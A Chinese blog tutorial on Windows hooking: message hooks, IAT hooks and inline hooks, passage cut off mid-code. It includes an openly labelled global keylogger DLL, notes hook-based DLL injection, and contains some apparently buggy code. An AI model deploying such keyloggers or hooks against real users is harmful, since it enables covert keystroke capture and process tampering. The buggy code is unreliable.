



<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <meta name="description" content="HOOK技术简介：1.介绍​    MSDN上定义如下： ​    A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process cert">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/04/07/HOOK%E6%8A%80%E6%9C%AF%E7%AE%80%E4%BB%8B%EF%BC%9A/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="HOOK技术简介：1.介绍​    MSDN上定义如下： ​    A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process cert">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-04-06T16:16:50.600Z">
<meta property="article:modified_time" content="2022-04-06T16:16:50.600Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  <title>Hexo</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fencing!</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-07 00:16" pubdate>
        2022年4月7日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      20 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none"></h1>
            
            <div class="markdown-body">
              <h1 id="HOOK技术简介："><a href="#HOOK技术简介：" class="headerlink" title="HOOK技术简介："></a>HOOK技术简介：</h1><h2 id="1-介绍"><a href="#1-介绍" class="headerlink" title="1.介绍"></a>1.介绍</h2><p>​    MSDN上定义如下：</p>
<p>​    A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.</p>
<p>​    HOOK一词直译过来就是“钩子”的意思，即钩取所需内容所使用的工具。Windows操作系统是以事件驱动方式的，事件被包装了消息发送给窗口。</p>
<p>消息处理过程：</p>
<p>例如：</p>
<p>1.按下键盘后，会产生键盘被按下的消息，这个消息首先会被添加到系统的消息队列中。</p>
<p>2.操作系统从消息队列中取出消息，添加到相应的程序的消息队列中。</p>
<p>3.程序通过自身的GetMessage获取消息，DispatchMessage分发消息，再通过消息回调函数处理消息。</p>
<p>​    HOOK是一种特殊的消息处理机制，它可以监视系统或者进程中的各种事件消息，截获发往目标窗口的消息并进行处理，处理之后再发给下一个消息钩子，或者扔到应用程序的消息队列当中。所以说，我们可以在系统中自定义钩子，用来监视系统中特定事件的发生，完成特定功能，如屏幕取词，监视日志，截获键盘、鼠标输入等等。</p>
<p>​    编写消息HOOK的时候需要将设置HOOK的函数写到DLL文件里，勾住一个线程之后，产生消息时，如果发现钩子的DLL不在进程中，系统会将DLL强行加载进去，可利用这个特性进行DLL注入，即HOOK注入。</p>
<h2 id="2-HOOK的几种方式"><a href="#2-HOOK的几种方式" class="headerlink" title="2.HOOK的几种方式"></a>2.HOOK的几种方式</h2><h3 id="一-系统消息HOOK"><a href="#一-系统消息HOOK" class="headerlink" title="一.系统消息HOOK"></a>一.系统消息HOOK</h3><p>HOOK涉及到的API函数：</p>
<p>SetWindowsHookEx:设置钩子</p>
<p>CallNextHookEx：将钩子的信息传递到当前钩子链当中的下一个子程序。</p>
<p>UnhookWindowsHookEx：卸载钩子</p>
<p>​    利用WINDOWS提供的API函数进行HOOK，由于SetWindowsHookEx函数接受的最后一个参数为线程ID，因此该HOOK可以以线程为单位进行筛选，针对某一线程的消息进行HOOK。</p>
<p>​    系统消息HOOK的实现代码如下，下方为一恶意键盘记录器的实例：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&quot;framework.h&quot;</span></span><br>HINSTANCE g_hInstance = <span class="hljs-literal">NULL</span>;<span class="hljs-comment">//取DLL文件的模块句柄</span><br>HHOOK hhook = <span class="hljs-literal">NULL</span>;<br><span class="hljs-comment">//恶意键盘记录器</span><br><span class="hljs-function">LRESULT CALLBACK <span class="hljs-title">KeyboardProc</span><span class="hljs-params">(<span class="hljs-keyword">int</span> code,</span></span><br><span class="hljs-params"><span class="hljs-function">    WPARAM wParam,</span></span><br><span class="hljs-params"><span class="hljs-function">    LPARAM lParam</span></span><br><span class="hljs-params"><span class="hljs-function">)</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-comment">//查阅CSDN得知lParam的最高位代表键盘状态，0代表按下，1代表松开</span><br>    <span class="hljs-keyword">if</span> (code == HC_ACTION&amp;&amp;(lParam&amp;<span class="hljs-number">0x80000000</span>==<span class="hljs-number">0</span>))<br>    &#123;<br>        <span class="hljs-comment">//创建数组储存所有键位的状态</span><br>        BYTE KeyState[<span class="hljs-number">256</span>]&#123; <span class="hljs-number">0</span> &#125;;<br>        <span class="hljs-comment">//获取键位状态并赋值给所创建数组</span><br>        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">GetKeyboardState</span>(KeyState))<br>        &#123;<br>            LONG keyinfo = lParam;<br>            UINT keycode = (keyinfo &gt;&gt; <span class="hljs-number">16</span>) &amp; <span class="hljs-number">0x00ff</span>;<br>            WCHAR wkeycode = <span class="hljs-number">0</span>;<br>            <span class="hljs-built_in">ToAscii</span>((UINT)wParam, keycode, KeyState, (LPWORD)&amp;wkeycode, <span class="hljs-number">0</span>);<br>            CHAR strinfo[<span class="hljs-number">12</span>]&#123; <span class="hljs-number">0</span> &#125;;          <br>            <span class="hljs-built_in">sprintf_s</span>(strinfo, _countof(strinfo), <span class="hljs-string">&quot;xxx%c&quot;</span>, wkeycode);<br>            <span class="hljs-built_in">OutputDebugStringA</span>(strinfo);<br>            <span class="hljs-comment">//返回1则代表丢弃该消息</span><br>            <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">CallNextHookEx</span>(hhook,code,wParam,lParam);<br>&#125;<br><span class="hljs-comment">//安装钩子</span><br><span class="hljs-function">BOOL <span class="hljs-title">InstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-comment">//此处最后一个参数为需要HOOK的线程ID，若置零则为全局HOOK</span><br>    hhook=<span class="hljs-built_in">SetWindowsHookExA</span>(WH_KEYBOARD, KeyboardProc, g_hInstance, <span class="hljs-literal">NULL</span>);<br>    <span class="hljs-keyword">if</span> (hhook)<br>    &#123;<br>        <span class="hljs-keyword">return</span> TRUE;<br>    &#125;<br>    <span class="hljs-keyword">return</span> FALSE;<br>&#125;<br><span class="hljs-comment">//卸载钩子</span><br><span class="hljs-function">BOOL <span class="hljs-title">unInstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">UnhookWindowsHookEx</span>(hhook);<br>&#125;<br><br><span class="hljs-function">BOOL APIENTRY <span class="hljs-title">DllMain</span><span class="hljs-params">( HMODULE hModule,</span></span><br><span class="hljs-params"><span class="hljs-function">                       DWORD  reason,</span></span><br><span class="hljs-params"><span class="hljs-function">                       LPVOID lpReserved</span></span><br><span class="hljs-params"><span class="hljs-function">                     )</span></span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-built_in"><span class="hljs-keyword">switch</span></span> (reason)<br>    &#123;<br>    <span class="hljs-keyword">case</span> DLL_PROCESS_ATTACH:<br>        g_hInstance = hModule;<br>    <span class="hljs-keyword">case</span> DLL_THREAD_ATTACH:<br>    <span class="hljs-keyword">case</span> DLL_THREAD_DETACH:<br>    <span class="hljs-keyword">case</span> DLL_PROCESS_DETACH:<br>        <span class="hljs-keyword">break</span>;<br>    &#125;<br>    <span class="hljs-keyword">return</span> TRUE;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="二-IATHOOK"><a href="#二-IATHOOK" class="headerlink" title="二.IATHOOK"></a>二.IATHOOK</h3><p>即通过在IAT中寻找到目标函数的地址，将其更改为自己的函数的地址，借此完成HOOK，实现代码如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&quot;hookmain.h&quot;</span></span><br><span class="hljs-function"><span class="hljs-keyword">int</span> WINAPI <span class="hljs-title">HookMessageBoxW</span><span class="hljs-params">(</span></span><br><span class="hljs-params"><span class="hljs-function">	HWND   hWnd,</span></span><br><span class="hljs-params"><span class="hljs-function">	LPCSTR lpText,</span></span><br><span class="hljs-params"><span class="hljs-function">	LPCSTR lpCaption,</span></span><br><span class="hljs-params"><span class="hljs-function">	UINT   uType)</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">int</span> result=<span class="hljs-built_in">MessageBoxA</span>(<span class="hljs-number">0</span>, <span class="hljs-string">&quot;success!&quot;</span>, <span class="hljs-string">&quot;notice&quot;</span>, MB_OK);<br>	<span class="hljs-keyword">return</span> result;<br>&#125;<br><span class="hljs-function">BOOL <span class="hljs-title">InstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-comment">//存储初始属性</span><br>	DWORD dwOldProtect = <span class="hljs-number">0</span>;<br>	<span class="hljs-comment">//更改属性防止没有写入权限导致报错</span><br>	<span class="hljs-built_in">VirtualProtect</span>(g_iataddr, <span class="hljs-number">4</span>, PAGE_EXECUTE_READWRITE,&amp;dwOldProtect);<br>	<span class="hljs-comment">//将函数地址更改为自己写的函数的地址</span><br>	*g_iataddr = (DWORD)HookMessageBoxW;<br>	<span class="hljs-comment">//将属性还原</span><br>	<span class="hljs-built_in">VirtualProtect</span>(g_iataddr, <span class="hljs-number">4</span>, dwOldProtect, &amp;dwOldProtect);<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br><span class="hljs-function">BOOL <span class="hljs-title">UninstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	DWORD dwOldProtect = <span class="hljs-number">0</span>;<br>	<span class="hljs-built_in">VirtualProtect</span>(g_iataddr, <span class="hljs-number">4</span>, PAGE_EXECUTE_READWRITE, &amp;dwOldProtect);<br>	<span class="hljs-comment">//将函数地址还原</span><br>	*g_iataddr = (DWORD)g_original;<br>	<span class="hljs-built_in">VirtualProtect</span>(g_iataddr, <span class="hljs-number">4</span>, dwOldProtect, &amp;dwOldProtect);<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br><span class="hljs-function">DWORD* <span class="hljs-title">GetIATAddr</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* dllname, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* funcname)</span></span><br><span class="hljs-function"></span>&#123;<br>	HMODULE hmodule=<span class="hljs-built_in">GetModuleHandle</span>(<span class="hljs-number">0</span>);<br>	<span class="hljs-comment">//文件偏移</span><br>	DWORD dwhmodule = (DWORD)hmodule;<br>	PIMAGE_DOS_HEADER pDosheader = (PIMAGE_DOS_HEADER)dwhmodule;<br>	PIMAGE_NT_HEADERS pntheader = (PIMAGE_NT_HEADERS)(pDosheader-&gt;e_lfanew + dwhmodule);<br>	PIMAGE_OPTIONAL_HEADER poptionalheader = &amp;pntheader-&gt;OptionalHeader;<br>	IMAGE_DATA_DIRECTORY datadirectory = poptionalheader-&gt;DataDirectory[<span class="hljs-number">1</span>];<br>	PIMAGE_IMPORT_DESCRIPTOR piid=(PIMAGE_IMPORT_DESCRIPTOR)(datadirectory.VirtualAddress + dwhmodule);<br>	<span class="hljs-keyword">while</span> (piid-&gt;Name)<br>	&#123;<br>		<span class="hljs-keyword">char</span>* iatdllname = (<span class="hljs-keyword">char</span>*)(piid-&gt;Name + dwhmodule);<br>		<span class="hljs-comment">//遍历，寻找符合要求的DLL</span><br>		<span class="hljs-keyword">if</span> (!_stricmp(iatdllname, dllname))<span class="hljs-comment">//此处比较不区分大小写</span><br>		&#123;<br>			<span class="hljs-comment">//获取导入名称表</span><br>			PIMAGE_THUNK_DATA pINT = (PIMAGE_THUNK_DATA)(piid-&gt;OriginalFirstThunk + dwhmodule);<br>			<span class="hljs-comment">//获取导入地址表</span><br>			PIMAGE_THUNK_DATA pIAT = (PIMAGE_THUNK_DATA)(piid-&gt;FirstThunk + dwhmodule);<br>			<span class="hljs-keyword">while</span> (pINT-&gt;u1.Function)<br>			&#123;<br>				<span class="hljs-keyword">if</span> ((pINT-&gt;u1.Ordinal&amp;<span class="hljs-number">0x80000000</span>)==<span class="hljs-number">0</span>)<br>				&#123;	<span class="hljs-comment">//获取函数名</span><br>					PIMAGE_IMPORT_BY_NAME pimportname=(PIMAGE_IMPORT_BY_NAME)(pINT-&gt;u1.Function + dwhmodule);<br>					<span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(pimportname-&gt;Name, funcname) == <span class="hljs-number">0</span>)<br>					&#123;<br>						<span class="hljs-comment">//返回所寻找的函数地址</span><br>						<span class="hljs-keyword">return</span> (DWORD*)pIAT;<br>					&#125;<br>				&#125;<br>				pINT++;<br>			&#125;<br>		&#125;<br>		piid++;<br>	&#125;<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><span class="hljs-function">BOOL WINAPI <span class="hljs-title">DllMain</span><span class="hljs-params">(</span></span><br><span class="hljs-params"><span class="hljs-function">	HMODULE hModule,</span></span><br><span class="hljs-params"><span class="hljs-function">	DWORD reason,</span></span><br><span class="hljs-params"><span class="hljs-function">	LPVOID lpreserved</span></span><br><span class="hljs-params"><span class="hljs-function">)</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">if</span> (reason == DLL_PROCESS_ATTACH)<br>	&#123;<br>		<span class="hljs-built_in">MessageBoxA</span>(<span class="hljs-number">0</span>, <span class="hljs-string">&quot;DLL has run&quot;</span>, <span class="hljs-string">&quot;notice&quot;</span>, MB_OK);<br>		<span class="hljs-comment">//获取IAT表</span><br>		g_iataddr=<span class="hljs-built_in">GetIATAddr</span>(<span class="hljs-string">&quot;USER32.dll&quot;</span>, <span class="hljs-string">&quot;MessageBoxW&quot;</span>);<br>		<span class="hljs-comment">//保存要HOOK的函数地址</span><br>		g_original = (DWORD*)g_iataddr;<br>		<span class="hljs-comment">//安装钩子</span><br>		<span class="hljs-built_in">InstallHook</span>();<br>	&#125;<br>	<span class="hljs-keyword">if</span> (reason == DLL_PROCESS_DETACH)<br>	&#123;<br>		<span class="hljs-built_in">UninstallHook</span>();<br>	&#125;<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="三-INLINE-HOOK"><a href="#三-INLINE-HOOK" class="headerlink" title="三.INLINE HOOK"></a>三.INLINE HOOK</h3><p>inline hook是一种通过修改机器码的方式来实现hook的技术，具体实现代码如下：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&quot;dllmain.h&quot;</span></span><br>DWORD g_unhook = <span class="hljs-literal">NULL</span>;<br><span class="hljs-keyword">char</span> g_oldcode[<span class="hljs-number">5</span>]&#123; <span class="hljs-number">0</span> &#125;;<br><span class="hljs-keyword">char</span> g_newcode[<span class="hljs-number">5</span>]&#123; <span class="hljs-number">0xE9</span> &#125;;<br><span class="hljs-comment">//INLINE HOOK</span><br><span class="hljs-comment">//找到HOOK函数地址</span><br><span class="hljs-comment">//保存HOOK函数前五个字节</span><br><span class="hljs-comment">//计算目标函数距离JMP下一指令的偏移offset</span><br><span class="hljs-comment">//改变函数前五个字节，0XE9 offset</span><br><span class="hljs-function"><span class="hljs-keyword">int</span> WINAPI <span class="hljs-title">myMessageBoxW</span><span class="hljs-params">(</span></span><br><span class="hljs-params"><span class="hljs-function">	_In_opt_ HWND hWnd,</span></span><br><span class="hljs-params"><span class="hljs-function">	_In_opt_ LPCWSTR lpText,</span></span><br><span class="hljs-params"><span class="hljs-function">	_In_opt_ LPCWSTR lpCaption,</span></span><br><span class="hljs-params"><span class="hljs-function">	_In_ UINT uType)</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-built_in">UnInstallHook</span>();<br>	<span class="hljs-keyword">int</span> result=<span class="hljs-built_in">MessageBoxW</span>(<span class="hljs-number">0</span>, <span class="hljs-string">L&quot;done!&quot;</span>, <span class="hljs-string">L&quot;notice&quot;</span>, MB_OK);<br>	<span class="hljs-built_in">InstallHook</span>();<br>	<span class="hljs-keyword">return</span> result;<br>&#125;<br><span class="hljs-function">BOOL <span class="hljs-title">InitHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-comment">//找到要HOOK的函数地址</span><br>	HMODULE hmodule = <span class="hljs-built_in">LoadLibraryA</span>(<span class="hljs-string">&quot;user32.dll&quot;</span>);<br>	<span class="hljs-keyword">if</span> (hmodule == <span class="hljs-number">0</span>)<br>	&#123;<br>		<span class="hljs-keyword">return</span> FALSE;<br>	&#125;<br>	g_unhook=(DWORD)<span class="hljs-built_in">GetProcAddress</span>(hmodule, <span class="hljs-string">&quot;MessageBoxW&quot;</span>);<br>	<span class="hljs-comment">//patch函数前五字节</span><br>	<span class="hljs-built_in">memcpy</span>(g_oldcode, (<span class="hljs-keyword">char</span>*)g_unhook, <span class="hljs-number">5</span>);<br>	<span class="hljs-comment">//计算偏移</span><br>	DWORD offset =(DWORD)myMessageBoxW-(g_unhook + <span class="hljs-number">5</span>);<br>	<span class="hljs-comment">//保存HOOK后的5个字节</span><br>	<span class="hljs-built_in">memcpy</span>(&amp;g_newcode[<span class="hljs-number">1</span>], &amp;offset,<span class="hljs-number">4</span>);<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br><span class="hljs-function">BOOL <span class="hljs-title">InstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	DWORD oldProtect = <span class="hljs-literal">NULL</span>;<br>	<span class="hljs-built_in">VirtualProtect</span>((DWORD*)g_unhook, <span class="hljs-number">5</span>, PAGE_EXECUTE_READWRITE, &amp;oldProtect);<br>	<span class="hljs-built_in">memcpy</span>((DWORD*)g_unhook, g_newcode, <span class="hljs-number">5</span>);<br>	<span class="hljs-built_in">VirtualProtect</span>((DWORD*)g_unhook, <span class="hljs-number">5</span>, oldProtect, &amp;oldProtect);<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br><span class="hljs-function">BOOL <span class="hljs-title">UnInstallHook</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	DWORD oldProtect = <span class="hljs-literal">NULL</span>;<br>	<span class="hljs-built_in">VirtualProtect</span>((DWORD*)g_unhook, <span class="hljs-number">5</span>, PAGE_EXECUTE_READWRITE, &amp;oldProtect);<br>	<span class="hljs-built_in">memcpy</span>((DWORD*)g_unhook, g_oldcode, <span class="hljs-number">5</span>);<br>	<span class="hljs-built_in">VirtualProtect</span>((DWORD*)g_unhook, <span class="hljs-number">5</span>, oldProtect, &amp;oldProtect);<br>	<span class="hljs-keyword">return</span> TRUE;<br>&#125;<br><span class="hljs-function">BOOL WINAPI <span class="hljs-title">DllMain</span><span class="hljs-params">(</span></span><br><span class="hljs-params"><span class="hljs-function">	HMODULE hmodule,</span></span><br><span class="hljs-params"><span class="hljs-function">	DWORD reason,</span></span><br><span class="hljs-params"><span class="hljs-function">	LPVOID lpreserved</span></span><br><span class="hljs-params"><span class="hljs-function">)</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">if</span> (reason == DLL_PROCESS_ATTACH)<br>	&#123;<br>		<span class="hljs-built_in">InitHook</span>();<br>		<span class="hljs-built_in">InstallHook</span>();<br>	&#125;<br>	<span 